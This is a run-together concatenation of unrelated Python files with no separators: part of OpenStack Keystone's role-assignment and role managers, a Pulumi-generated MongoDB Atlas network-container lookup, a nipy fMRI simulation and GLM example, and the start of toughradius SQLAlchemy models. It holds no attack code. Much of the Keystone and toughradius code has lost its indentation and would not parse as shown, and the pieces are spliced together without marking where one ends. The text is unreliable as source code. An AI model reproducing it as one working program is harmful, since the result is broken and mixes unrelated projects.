# relevant, since domains don't inherit assignments
inherited = False if domain_id else inherited
# List user or explicit group assignments.
# Due to the need to expand implied roles, this call will skip
# filtering by role_id and instead return the whole set of roles.
# Matching on the specified role is performed at the end.
direct_refs = list_role_assignments_for_actor(
role_id=None, user_id=user_id, group_ids=source_from_group_ids,
project_id=project_id, subtree_ids=subtree_ids,
domain_id=domain_id, inherited=inherited)
# And those from the user's groups, so long as we are not restricting
# to a set of source groups (in which case we already got those
# assignments in the direct listing above).
group_refs = []
if not source_from_group_ids and user_id:
group_ids = self._get_group_ids_for_user_id(user_id)
if group_ids:
group_refs = list_role_assignments_for_actor(
role_id=None, project_id=project_id,
subtree_ids=subtree_ids, group_ids=group_ids,
domain_id=domain_id, inherited=inherited)
# Expand grouping and inheritance on retrieved role assignments
refs = []
expand_groups = (source_from_group_ids is None)
for ref in (direct_refs + group_refs):
refs += self._expand_indirect_assignment(
ref, user_id, project_id, subtree_ids, expand_groups)
refs = self.add_implied_roles(refs)
if strip_domain_roles:
refs = self._strip_domain_roles(refs)
if role_id:
refs = self._filter_by_role_id(role_id, refs)
return refs
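    # Summary of the effective-mode pipeline above (descriptive comment only):
    # 1) fetch the direct user and group assignments that could affect the
    #    requested filters, 2) expand group and inherited assignments into
    #    per-user, per-project refs, 3) add implied roles, 4) optionally strip
    #    domain-specific roles, and 5) filter by role_id if one was requested.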
def _list_direct_role_assignments(self, role_id, user_id, group_id, system,
domain_id, project_id, subtree_ids,
inherited):
"""List role assignments without applying expansion.
Returns a list of direct role assignments, where their attributes match
the provided filters. If subtree_ids is not None, then we also want to
include all subtree_ids in the filter as well.
"""
group_ids = [group_id] if group_id else None
project_ids_of_interest = None
if project_id:
if subtree_ids:
project_ids_of_interest = subtree_ids + [project_id]
else:
project_ids_of_interest = [project_id]
project_and_domain_assignments = []
if not system:
project_and_domain_assignments = self.driver.list_role_assignments(
role_id=role_id, user_id=user_id, group_ids=group_ids,
domain_id=domain_id, project_ids=project_ids_of_interest,
inherited_to_projects=inherited)
system_assignments = []
if system or (not project_id and not domain_id and not system):
if user_id:
assignments = self.list_system_grants_for_user(user_id)
for assignment in assignments:
system_assignments.append(
{'system': {'all': True},
'user_id': user_id,
'role_id': assignment['id']}
)
elif group_id:
assignments = self.list_system_grants_for_group(group_id)
for assignment in assignments:
system_assignments.append(
{'system': {'all': True},
'group_id': group_id,
'role_id': assignment['id']}
)
else:
assignments = self.list_all_system_grants()
for assignment in assignments:
a = {}
if assignment['type'] == self._GROUP_SYSTEM:
a['group_id'] = assignment['actor_id']
elif assignment['type'] == self._USER_SYSTEM:
a['user_id'] = assignment['actor_id']
a['role_id'] = assignment['role_id']
a['system'] = {'all': True}
system_assignments.append(a)
            # Filter out any system assignments that do not match the
            # requested role_id. Building a new list avoids mutating
            # system_assignments while iterating over it, which would skip
            # entries.
            if role_id:
                system_assignments = [
                    assignment for assignment in system_assignments
                    if assignment['role_id'] == role_id
                ]
assignments = []
for assignment in itertools.chain(
project_and_domain_assignments, system_assignments):
assignments.append(assignment)
return assignments
def list_role_assignments(self, role_id=None, user_id=None, group_id=None,
system=None, domain_id=None, project_id=None,
include_subtree=False, inherited=None,
effective=None, include_names=False,
source_from_group_ids=None,
strip_domain_roles=True):
"""List role assignments, honoring effective mode and provided filters.
Returns a list of role assignments, where their attributes match the
provided filters (role_id, user_id, group_id, domain_id, project_id and
inherited). If include_subtree is True, then assignments on all
descendants of the project specified by project_id are also included.
The inherited filter defaults to None, meaning to get both
non-inherited and inherited role assignments.
If effective mode is specified, this means that rather than simply
return the assignments that match the filters, any group or
inheritance assignments will be expanded. Group assignments will
become assignments for all the users in that group, and inherited
assignments will be shown on the projects below the assignment point.
Think of effective mode as being the list of assignments that actually
affect a user, for example the roles that would be placed in a token.
        If include_names is set to true, the entities' names are returned
        in addition to their IDs.
source_from_group_ids is a list of group IDs and, if specified, then
only those assignments that are derived from membership of these groups
are considered, and any such assignments will not be expanded into
their user membership assignments. This is different to a group filter
of the resulting list, instead being a restriction on which assignments
should be considered before expansion of inheritance. This option is
only used internally (i.e. it is not exposed at the API level) and is
only supported in effective mode (since in regular mode there is no
difference between this and a group filter, other than it is a list of
groups).
In effective mode, any domain specific roles are usually stripped from
the returned assignments (since such roles are not placed in tokens).
This stripping can be disabled by specifying strip_domain_roles=False,
which is useful for internal calls like trusts which need to examine
the full set of roles.
"""
subtree_ids = None
if project_id and include_subtree:
subtree_ids = (
[x['id'] for x in
PROVIDERS.resource_api.list_projects_in_subtree(
project_id)])
if system != 'all':
system = None
if effective:
role_assignments = self._list_effective_role_assignments(
role_id, user_id, group_id, domain_id, project_id,
subtree_ids, inherited, source_from_group_ids,
strip_domain_roles)
else:
role_assignments = self._list_direct_role_assignments(
role_id, user_id, group_id, system, domain_id, project_id,
subtree_ids, inherited)
if include_names:
return self._get_names_from_role_assignments(role_assignments)
return role_assignments
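    # Illustrative usage sketch (hypothetical IDs, not part of the original
    # module):
    #     manager.list_role_assignments(user_id='u1', project_id='p1')
    #     manager.list_role_assignments(user_id='u1', project_id='p1',
    #                                   effective=True, include_names=True)
    # The first call returns only assignments stored directly for 'u1'; the
    # second also expands group membership, inheritance and implied roles.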
def _get_names_from_role_assignments(self, role_assignments):
role_assign_list = []
for role_asgmt in role_assignments:
new_assign = copy.deepcopy(role_asgmt)
for key, value in role_asgmt.items():
if key == 'domain_id':
_domain = PROVIDERS.resource_api.get_domain(value)
new_assign['domain_name'] = _domain['name']
elif key == 'user_id':
try:
# Note(knikolla): Try to get the user, otherwise
# if the user wasn't found in the backend
# use empty values.
_user = PROVIDERS.identity_api.get_user(value)
except exception.UserNotFound:
msg = ('User %(user)s not found in the'
' backend but still has role assignments.')
LOG.warning(msg, {'user': value})
new_assign['user_name'] = ''
new_assign['user_domain_id'] = ''
new_assign['user_domain_name'] = ''
else:
new_assign['user_name'] = _user['name']
new_assign['user_domain_id'] = _user['domain_id']
new_assign['user_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_user['domain_id'])['name'])
elif key == 'group_id':
try:
# Note(knikolla): Try to get the group, otherwise
# if the group wasn't found in the backend
# use empty values.
_group = PROVIDERS.identity_api.get_group(value)
except exception.GroupNotFound:
msg = ('Group %(group)s not found in the'
' backend but still has role assignments.')
LOG.warning(msg, {'group': value})
new_assign['group_name'] = ''
new_assign['group_domain_id'] = ''
new_assign['group_domain_name'] = ''
else:
new_assign['group_name'] = _group['name']
new_assign['group_domain_id'] = _group['domain_id']
new_assign['group_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_group['domain_id'])['name'])
elif key == 'project_id':
_project = PROVIDERS.resource_api.get_project(value)
new_assign['project_name'] = _project['name']
new_assign['project_domain_id'] = _project['domain_id']
new_assign['project_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_project['domain_id'])['name'])
elif key == 'role_id':
_role = PROVIDERS.role_api.get_role(value)
new_assign['role_name'] = _role['name']
if _role['domain_id'] is not None:
new_assign['role_domain_id'] = _role['domain_id']
new_assign['role_domain_name'] = (
PROVIDERS.resource_api.get_domain(
_role['domain_id'])['name'])
role_assign_list.append(new_assign)
return role_assign_list
def delete_group_assignments(self, group_id):
# FIXME(lbragstad): This should be refactored in the Rocky release so
# that we can pass the group_id to the system assignment backend like
# we do with the project and domain assignment backend. Holding off on
# this because it will require an interface change to the backend,
# making it harder to backport for Queens RC.
self.driver.delete_group_assignments(group_id)
system_assignments = self.list_system_grants_for_group(group_id)
for assignment in system_assignments:
self.delete_system_grant_for_group(group_id, assignment['id'])
def delete_user_assignments(self, user_id):
# FIXME(lbragstad): This should be refactored in the Rocky release so
# that we can pass the user_id to the system assignment backend like we
# do with the project and domain assignment backend. Holding off on
# this because it will require an interface change to the backend,
# making it harder to backport for Queens RC.
self.driver.delete_user_assignments(user_id)
system_assignments = self.list_system_grants_for_user(user_id)
for assignment in system_assignments:
self.delete_system_grant_for_user(user_id, assignment['id'])
def check_system_grant_for_user(self, user_id, role_id):
"""Check if a user has a specific role on the system.
:param user_id: the ID of the user in the assignment
:param role_id: the ID of the system role in the assignment
:raises keystone.exception.RoleAssignmentNotFound: if the user doesn't
have a role assignment matching the role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
return self.driver.check_system_grant(
role_id, user_id, target_id, inherited
)
def list_system_grants_for_user(self, user_id):
"""Return a list of roles the user has on the system.
:param user_id: the ID of the user
:returns: a list of role assignments the user has system-wide
"""
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._USER_SYSTEM
grants = self.driver.list_system_grants(
user_id, target_id, assignment_type
)
grant_ids = []
for grant in grants:
grant_ids.append(grant['role_id'])
return PROVIDERS.role_api.list_roles_from_ids(grant_ids)
def create_system_grant_for_user(self, user_id, role_id):
"""Grant a user a role on the system.
:param user_id: the ID of the user
:param role_id: the ID of the role to grant on the system
"""
role = PROVIDERS.role_api.get_role(role_id)
if role.get('domain_id'):
raise exception.ValidationError(
'Role %(role_id)s is a domain-specific role. Unable to use '
'a domain-specific role in a system assignment.' % {
'role_id': role_id
}
)
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._USER_SYSTEM
inherited = False
self.driver.create_system_grant(
role_id, user_id, target_id, assignment_type, inherited
)
def delete_system_grant_for_user(self, user_id, role_id):
"""Remove a system grant from a user.
:param user_id: the ID of the user
:param role_id: the ID of the role to remove from the user on the
system
:raises keystone.exception.RoleAssignmentNotFound: if the user doesn't
have a role assignment with role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
self.driver.delete_system_grant(role_id, user_id, target_id, inherited)
def check_system_grant_for_group(self, group_id, role_id):
"""Check if a group has a specific role on the system.
:param group_id: the ID of the group in the assignment
:param role_id: the ID of the system role in the assignment
:raises keystone.exception.RoleAssignmentNotFound: if the group doesn't
have a role assignment matching the role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
return self.driver.check_system_grant(
role_id, group_id, target_id, inherited
)
def list_system_grants_for_group(self, group_id):
"""Return a list of roles the group has on the system.
:param group_id: the ID of the group
:returns: a list of role assignments the group has system-wide
"""
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._GROUP_SYSTEM
grants = self.driver.list_system_grants(
group_id, target_id, assignment_type
)
grant_ids = []
for grant in grants:
grant_ids.append(grant['role_id'])
return PROVIDERS.role_api.list_roles_from_ids(grant_ids)
def create_system_grant_for_group(self, group_id, role_id):
"""Grant a group a role on the system.
:param group_id: the ID of the group
:param role_id: the ID of the role to grant on the system
"""
role = PROVIDERS.role_api.get_role(role_id)
if role.get('domain_id'):
raise exception.ValidationError(
'Role %(role_id)s is a domain-specific role. Unable to use '
'a domain-specific role in a system assignment.' % {
'role_id': role_id
}
)
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = self._GROUP_SYSTEM
inherited = False
self.driver.create_system_grant(
role_id, group_id, target_id, assignment_type, inherited
)
def delete_system_grant_for_group(self, group_id, role_id):
"""Remove a system grant from a group.
:param group_id: the ID of the group
:param role_id: the ID of the role to remove from the group on the
system
:raises keystone.exception.RoleAssignmentNotFound: if the group doesn't
have a role assignment with role_id on the system
"""
target_id = self._SYSTEM_SCOPE_TOKEN
inherited = False
self.driver.delete_system_grant(
role_id, group_id, target_id, inherited
)
def list_all_system_grants(self):
"""Return a list of all system grants."""
actor_id = None
target_id = self._SYSTEM_SCOPE_TOKEN
assignment_type = None
return self.driver.list_system_grants(
actor_id, target_id, assignment_type
)
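    # Illustrative sketch of the system-grant helpers above (hypothetical IDs,
    # not part of the original module):
    #     manager.create_system_grant_for_user('u1', 'r1')
    #     manager.check_system_grant_for_user('u1', 'r1')   # raises if absent
    #     manager.list_system_grants_for_user('u1')         # list of role dicts
    #     manager.delete_system_grant_for_user('u1', 'r1')
    # Group-scoped grants follow the same pattern via the *_for_group methods.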
class RoleManager(manager.Manager):
"""Default pivot point for the Role backend."""
driver_namespace = 'keystone.role'
_provides_api = 'role_api'
_ROLE = 'role'
def __init__(self):
# If there is a specific driver specified for role, then use it.
# Otherwise retrieve the driver type from the assignment driver.
role_driver = CONF.role.driver
if role_driver is None:
# Explicitly load the assignment manager object
assignment_driver = CONF.assignment.driver
assignment_manager_obj = manager.load_driver(
Manager.driver_namespace,
assignment_driver)
role_driver = assignment_manager_obj.default_role_driver()
super(RoleManager, self).__init__(role_driver)
@MEMOIZE
def get_role(self, role_id):
return self.driver.get_role(role_id)
def get_unique_role_by_name(self, role_name, hints=None):
if not hints:
hints = driver_hints.Hints()
hints.add_filter("name", role_name, case_sensitive=True)
found_roles = PROVIDERS.role_api.list_roles(hints)
if not found_roles:
raise exception.RoleNotFound(
_("Role %s is not defined") % role_name
)
elif len(found_roles) == 1:
return {'id': found_roles[0]['id']}
else:
raise exception.AmbiguityError(resource='role',
name=role_name)
def create_role(self, role_id, role, initiator=None):
ret = self.driver.create_role(role_id, role)
notifications.Audit.created(self._ROLE, role_id, initiator)
if MEMOIZE.should_cache(ret):
self.get_role.set(ret, self, role_id)
return ret
@manager.response_truncated
def list_roles(self, hints=None):
return self.driver.list_roles(hints or driver_hints.Hints())
def update_role(self, role_id, role, initiator=None):
original_role = self.driver.get_role(role_id)
if ('domain_id' in role and
role['domain_id'] != original_role['domain_id']):
raise exception.ValidationError(
message=_('Update of `domain_id` is not allowed.'))
ret = self.driver.update_role(role_id, role)
notifications.Audit.updated(self._ROLE, role_id, initiator)
self.get_role.invalidate(self, role_id)
return ret
def delete_role(self, role_id, initiator=None):
PROVIDERS.assignment_api.delete_role_assignments(role_id)
PROVIDERS.assignment_api._send_app_cred_notification_for_role_removal(
role_id
)
self.driver.delete_role(role_id)
notifications.Audit.deleted(self._ROLE, role_id, initiator)
self.get_role.invalidate(self, role_id)
reason = (
'Invalidating the token cache because role %(role_id)s has been '
'removed. Role assignments for users will be recalculated and '
'enforced accordingly the next time they authenticate or validate '
'a token' % {'role_id': role_id}
)
notifications.invalidate_token_cache_notification(reason)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
# TODO(ayoung): Add notification
def create_implied_role(self, prior_role_id, implied_role_id):
implied_role = self.driver.get_role(implied_role_id)
prior_role = self.driver.get_role(prior_role_id)
if implied_role['name'] in CONF.assignment.prohibited_implied_role:
raise exception.InvalidImpliedRole(role_id=implied_role_id)
if prior_role['domain_id'] is None and implied_role['domain_id']:
msg = _('Global role cannot imply a domain-specific role')
raise exception.InvalidImpliedRole(msg,
role_id=implied_role_id)
response = self.driver.create_implied_role(
prior_role_id, implied_role_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
return response
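    # Example of the rule enforced above (hypothetical role names): a global
    # (domain-less) prior role such as 'member' may imply another global role,
    # but making it imply a domain-specific role raises InvalidImpliedRole,
    # since domain-specific roles are never placed in tokens.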
def delete_implied_role(self, prior_role_id, implied_role_id):
self.driver.delete_implied_role(prior_role_id, implied_role_id)
COMPUTED_ASSIGNMENTS_REGION.invalidate()
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class GetNetworkContainerResult:
"""
A collection of values returned by getNetworkContainer.
"""
def __init__(__self__, atlas_cidr_block=None, azure_subscription_id=None, container_id=None, gcp_project_id=None, network_name=None, project_id=None, provider_name=None, provisioned=None, region=None, region_name=None, vnet_name=None, vpc_id=None, id=None):
if atlas_cidr_block and not isinstance(atlas_cidr_block, str):
raise TypeError("Expected argument 'atlas_cidr_block' to be a str")
__self__.atlas_cidr_block = atlas_cidr_block
"""
CIDR block that Atlas uses for your clusters. Atlas uses the specified CIDR block for all other Network Peering connections created in the project. The Atlas CIDR block must be at least a /24 and at most a /21 in one of the following [private networks](https://tools.ietf.org/html/rfc1918.html#section-3).
"""
if azure_subscription_id and not isinstance(azure_subscription_id, str):
raise TypeError("Expected argument 'azure_subscription_id' to be a str")
__self__.azure_subscription_id = azure_subscription_id
"""
Unique identifer of the Azure subscription in which the VNet resides.
"""
if container_id and not isinstance(container_id, str):
raise TypeError("Expected argument 'container_id' to be a str")
__self__.container_id = container_id
if gcp_project_id and not isinstance(gcp_project_id, str):
raise TypeError("Expected argument 'gcp_project_id' to be a str")
__self__.gcp_project_id = gcp_project_id
"""
Unique identifier of the GCP project in which the Network Peering connection resides.
"""
if network_name and not isinstance(network_name, str):
raise TypeError("Expected argument 'network_name' to be a str")
__self__.network_name = network_name
"""
Name of the Network Peering connection in the Atlas project.
"""
if project_id and not isinstance(project_id, str):
raise TypeError("Expected argument 'project_id' to be a str")
__self__.project_id = project_id
if provider_name and not isinstance(provider_name, str):
raise TypeError("Expected argument 'provider_name' to be a str")
__self__.provider_name = provider_name
"""
Cloud provider for this Network Peering connection. If omitted, Atlas sets this parameter to AWS.
"""
if provisioned and not isinstance(provisioned, bool):
raise TypeError("Expected argument 'provisioned' to be a bool")
__self__.provisioned = provisioned
"""
Indicates whether the project has Network Peering connections deployed in the container.
"""
if region and not isinstance(region, str):
raise TypeError("Expected argument 'region' to be a str")
__self__.region = region
"""
Azure region where the container resides.
"""
if region_name and not isinstance(region_name, str):
raise TypeError("Expected argument 'region_name' to be a str")
__self__.region_name = region_name
"""
AWS region.
"""
if vnet_name and not isinstance(vnet_name, str):
raise TypeError("Expected argument 'vnet_name' to be a str")
__self__.vnet_name = vnet_name
"""
The name of the Azure VNet. This value is null until you provision an Azure VNet in the container.
"""
if vpc_id and not isinstance(vpc_id, str):
raise TypeError("Expected argument 'vpc_id' to be a str")
__self__.vpc_id = vpc_id
"""
Unique identifier of the project’s VPC.
"""
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
__self__.id = id
"""
id is the provider-assigned unique ID for this managed resource.
"""
class AwaitableGetNetworkContainerResult(GetNetworkContainerResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkContainerResult(
atlas_cidr_block=self.atlas_cidr_block,
azure_subscription_id=self.azure_subscription_id,
container_id=self.container_id,
gcp_project_id=self.gcp_project_id,
network_name=self.network_name,
project_id=self.project_id,
provider_name=self.provider_name,
provisioned=self.provisioned,
region=self.region,
region_name=self.region_name,
vnet_name=self.vnet_name,
vpc_id=self.vpc_id,
id=self.id)
def get_network_container(container_id=None, project_id=None, opts=None):
"""
`.NetworkContainer` describes a Network Peering Container. The resource requires your Project ID and container ID.
> **IMPORTANT:** This resource creates one Network Peering container into which Atlas can deploy Network Peering connections. An Atlas project can have a maximum of one container for each cloud provider. You must have either the Project Owner or Organization Owner role to successfully call this endpoint.
> **NOTE:** Groups and projects are synonymous terms. You may find **group_id** in the official documentation.
:param str container_id: The Network Peering Container ID.
    :param str project_id: The unique ID for the project in which the Network Peering container resides.
> This content is derived from https://github.com/terraform-providers/terraform-provider-mongodbatlas/blob/master/website/docs/d/network_container.html.markdown.
"""
__args__ = dict()
__args__['containerId'] = container_id
__args__['projectId'] = project_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = utilities.get_version()
__ret__ = pulumi.runtime.invoke('mongodbatlas:index/getNetworkContainer:getNetworkContainer', __args__, opts=opts).value
return AwaitableGetNetworkContainerResult(
atlas_cidr_block=__ret__.get('atlasCidrBlock'),
azure_subscription_id=__ret__.get('azureSubscriptionId'),
container_id=__ret__.get('containerId'),
gcp_project_id=__ret__.get('gcpProjectId'),
network_name=__ret__.get('networkName'),
project_id=__ret__.get('projectId'),
provider_name=__ret__.get('providerName'),
provisioned=__ret__.get('provisioned'),
region=__ret__.get('region'),
region_name=__ret__.get('regionName'),
vnet_name=__ret__.get('vnetName'),
vpc_id=__ret__.get('vpcId'),
id=__ret__.get('id'))
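# Illustrative usage sketch (not part of the generated module; the package
# import name and the IDs below are assumptions): inside a Pulumi program this
# data source could be invoked as
#     import pulumi
#     import pulumi_mongodbatlas as mongodbatlas
#     container = mongodbatlas.get_network_container(
#         project_id="<PROJECT-ID>",
#         container_id="<CONTAINER-ID>")
#     pulumi.export("atlas_cidr_block", container.atlas_cidr_block)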
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
This is an example where:
1. A sequence of fMRI volumes is simulated
2. A design matrix describing all the effects related to the data is computed
3. A GLM is applied to all voxels
4. A contrast image is created
Requires matplotlib
Author : <NAME>, 2010
"""
print __doc__
import os
import os.path as op
import numpy as np
try:
import matplotlib.pyplot as plt
except ImportError:
raise RuntimeError("This script needs the matplotlib library")
from nibabel import save, Nifti1Image
import nipy.modalities.fmri.design_matrix as dm
from nipy.labs.utils.simul_multisubject_fmri_dataset import \
surrogate_4d_dataset
from nipy.modalities.fmri.glm import GeneralLinearModel
from nipy.modalities.fmri.experimental_paradigm import EventRelatedParadigm
#######################################
# Simulation parameters
#######################################
# volume mask
shape = (20, 20, 20)
affine = np.eye(4)
# Acquisition parameters: number of scans (n_scans) and volume repetition time
# value in seconds
n_scans = 128
tr = 2.4
# input paradigm information
frametimes = np.linspace(0, (n_scans - 1) * tr, n_scans)
# conditions are 0 1 0 1 0 1 ...
conditions = np.arange(20) % 2
# 20 onsets (in sec), first event 10 sec after the start of the first scan
onsets = np.linspace(5, (n_scans - 1) * tr - 10, 20)
# model with canonical HRF (could also be :
# 'canonical with derivative' or 'fir'
hrf_model = 'canonical'
# fake motion parameters to be included in the model
motion = np.cumsum(np.random.randn(n_scans, 6), 0)
add_reg_names = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz']
########################################
# Design matrix
########################################
paradigm = EventRelatedParadigm(conditions, onsets)
X, names = dm.dmtx_light(frametimes, paradigm, drift_model='cosine',
hfcut=128, hrf_model=hrf_model, add_regs=motion,
add_reg_names=add_reg_names)
#######################################
# Get the FMRI data
#######################################
fmri_data = surrogate_4d_dataset(shape=shape, n_scans=n_scans)[0]
# if you want to save it as an image
data_file = 'fmri_data.nii'
save(fmri_data, data_file)
########################################
# Perform a GLM analysis
########################################
# GLM fit
Y = fmri_data.get_data().reshape(np.prod(shape), n_scans)
glm = GeneralLinearModel(X)
glm.fit(Y.T)
# specify the contrast [1 -1 0 ..]
contrast = np.zeros(X.shape[1])
contrast[0] = 1
contrast[1] = - 1
# compute the contrast image related to it
zvals = glm.contrast(contrast).z_score()
contrast_image = Nifti1Image(np.reshape(zvals, shape), affine)
# if you want to save the contrast as an image
contrast_path = 'zmap.nii'
save(contrast_image, contrast_path)
print ('Wrote some of the results as images in directory %s' %
op.abspath(os.getcwd()))
h, c = np.histogram(zvals, 100)
# Show the histogram
plt.figure()
plt.bar(c[: - 1], h, width=.1)
plt.title(' Histogram of the z-values')
plt.show()
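# Additional illustrative step (not part of the original example): count how
# many voxels exceed a simple z threshold in the simulated contrast map. The
# threshold value below is an arbitrary choice for demonstration.
z_threshold = 3.0
n_active = int(np.sum(zvals > z_threshold))
print('%d voxels exceed z = %.1f' % (n_active, z_threshold))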
<filename>toughradius/manage/models.py
#!/usr/bin/env python
#coding:utf-8
import sqlalchemy
import warnings
warnings.simplefilter('ignore', sqlalchemy.exc.SAWarning)
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relation
from sqlalchemy.orm import scoped_session, sessionmaker
from hashlib import md5
from toughlib import utils
import functools
DeclarativeBase = declarative_base()
def get_metadata(db_engine):
global DeclarativeBase
metadata = DeclarativeBase.metadata
metadata.bind = db_engine
return metadata
class SystemSession(DeclarativeBase):
"""session表"""
__tablename__ = 'system_session'
__table_args__ = {
'mysql_engine' : 'MEMORY'
}
key = Column(u'_key', Unicode(length=512), primary_key=True, nullable=False,doc=u"session key")
value = Column(u'_value', Unicode(length=2048), nullable=False,doc=u"session value")
time = Column(u'_time', INTEGER(), nullable=False,doc=u"session timeout")
class SystemCache(DeclarativeBase):
"""cache表"""
__tablename__ = 'system_cache'
__table_args__ = {
'mysql_engine' : 'MEMORY'
}
key = Column(u'_key', Unicode(length=512), primary_key=True, nullable=False,doc=u"cache key")
value = Column(u'_value', Unicode(length=8192), nullable=False,doc=u"cache value")
time = Column(u'_time', INTEGER(), nullable=False,doc=u"cache timeout")
class TrNode(DeclarativeBase):
"""区域表"""
__tablename__ = 'tr_node'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"区域编号")
node_name = Column(u'node_name', Unicode(length=32), nullable=False,doc=u"区域名")
node_desc = Column(u'node_desc', Unicode(length=64), nullable=False,doc=u"区域描述")
class TrOperator(DeclarativeBase):
"""操作员表 操作员类型 0 系统管理员 1 普通操作员"""
__tablename__ = 'tr_operator'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"操作员id")
operator_type = Column('operator_type', INTEGER(), nullable=False,doc=u"操作员类型")
operator_name = Column(u'operator_name', Unicode(32), nullable=False,doc=u"操作员名称")
operator_pass = Column(u'operator_pass', Unicode(length=128), nullable=False,doc=u"操作员密码")
operator_status = Column(u'operator_status', INTEGER(), nullable=False,doc=u"操作员状态,0/1")
operator_desc = Column(u'operator_desc', Unicode(255), nullable=False,doc=u"操作员描述")
class TrOperatorNodes(DeclarativeBase):
"""操作员表关联区域"""
__tablename__ = 'tr_operator_nodes'
__table_args__ = {}
operator_name = Column(u'operator_name', Unicode(32),primary_key=True,nullable=False,doc=u"操作员名称")
node_name = Column(u'node_name', Unicode(32), primary_key=True,nullable=False,doc=u"区域名称")
class TrOperatorProducts(DeclarativeBase):
"""操作员表关联产品"""
__tablename__ = 'tr_operator_products'
__table_args__ = {}
# column definitions
operator_name = Column(u'operator_name', Unicode(32), primary_key=True, nullable=False, doc=u"操作员名称")
product_id = Column(u'product_id', Unicode(32), primary_key=True, nullable=False, doc=u"资费ID")
class TrOperatorRule(DeclarativeBase):
"""操作员权限表"""
__tablename__ = 'tr_operator_rule'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"权限id")
operator_name = Column(u'operator_name', Unicode(32), nullable=False,doc=u"操作员名称")
rule_path = Column(u'rule_path', Unicode(128), nullable=False,doc=u"权限URL")
rule_name = Column(u'rule_name', Unicode(128), nullable=False,doc=u"权限名称")
rule_category = Column(u'rule_category', Unicode(128), nullable=False,doc=u"权限分类")
class TrParam(DeclarativeBase):
"""系统参数表 """
__tablename__ = 'tr_param'
__table_args__ = {}
param_name = Column(u'param_name', Unicode(length=64), primary_key=True, nullable=False,doc=u"参数名")
param_value = Column(u'param_value', Unicode(length=1024), nullable=False,doc=u"参数值")
param_desc = Column(u'param_desc', Unicode(length=255),doc=u"参数描述")
class TrBas(DeclarativeBase):
"""BAS设备表"""
__tablename__ = 'tr_bas'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"设备id")
dns_name = Column(u'dns_name', Unicode(length=128), nullable=True, doc=u"DNS名称")
vendor_id = Column(u'vendor_id', Unicode(length=32), nullable=False,doc=u"厂商标识")
ip_addr = Column(u'ip_addr', Unicode(length=15), nullable=True,doc=u"IP地址")
bas_name = Column(u'bas_name', Unicode(length=64), nullable=False,doc=u"bas名称")
bas_secret = Column(u'bas_secret', Unicode(length=64), nullable=False,doc=u"共享密钥")
coa_port = Column(u'coa_port', INTEGER(), nullable=False,doc=u"CoA端口")
time_type = Column(u'time_type', SMALLINT(), nullable=False,doc=u"时区类型")
class TrBasNode(DeclarativeBase):
"""BAS设备关联区域"""
__tablename__ = 'tr_bas_node'
__table_args__ = {}
bas_id = Column(u'bas_id', INTEGER(), primary_key=True, nullable=False,doc=u"设备id")
node_id = Column(u'node_id', INTEGER(), primary_key=True, nullable=False,doc=u"区域id")
class TrRoster(DeclarativeBase):
"""黑白名单 0 白名单 1 黑名单"""
__tablename__ = 'tr_roster'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"黑白名单id")
mac_addr = Column('mac_addr', Unicode(length=17), nullable=False,doc=u"mac地址")
begin_time = Column('begin_time', Unicode(length=19), nullable=False,doc=u"生效开始时间")
end_time = Column('end_time', Unicode(length=19), nullable=False,doc=u"生效结束时间")
roster_type = Column('roster_type', SMALLINT(), nullable=False,doc=u"黑白名单类型")
class TrCustomer(DeclarativeBase):
"""用户信息表"""
__tablename__ = 'tr_customer'
__table_args__ = {}
customer_id = Column('customer_id', INTEGER(),
Sequence('customer_id_seq', start=100001, increment=1),
primary_key=True,nullable=False,doc=u"用户id")
node_id = Column('node_id', INTEGER(), nullable=False,doc=u"区域id")
customer_name = Column('customer_name', Unicode(length=64), nullable=False,doc=u"用户登录名")
password = Column('password', Unicode(length=128), nullable=False,doc=u"用户登录密码")
realname = Column('realname', Unicode(length=64), nullable=False,doc=u"")
idcard = Column('idcard', Unicode(length=32),doc=u"用户证件号码")
sex = Column('sex', SMALLINT(), nullable=True,doc=u"用户性别0/1")
age = Column('age', INTEGER(), nullable=True,doc=u"用户年龄")
email = Column('email', Unicode(length=255), nullable=True,doc=u"用户邮箱")
email_active = Column('email_active', SMALLINT(), default=0,doc=u"用户邮箱激活状态")
active_code = Column('active_code', Unicode(length=32), nullable=False,doc=u"邮箱激活码")
mobile = Column('mobile', Unicode(length=16), nullable=True,doc=u"用户手机")
mobile_active = Column('mobile_active', SMALLINT(), default=0,doc=u"用户手机绑定状态")
address = Column('address', Unicode(length=255), nullable=True,doc=u"用户地址")
customer_desc = Column(u'customer_desc', Unicode(255),doc=u"用户描述")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"创建时间")
update_time = Column('update_time', Unicode(length=19), nullable=False,doc=u"更新时间")
class TrCustomerOrder(DeclarativeBase):
"""
    Order (transaction) records.
    pay_status (payment status): 0 = unpaid, 1 = paid, 2 = cancelled.
"""
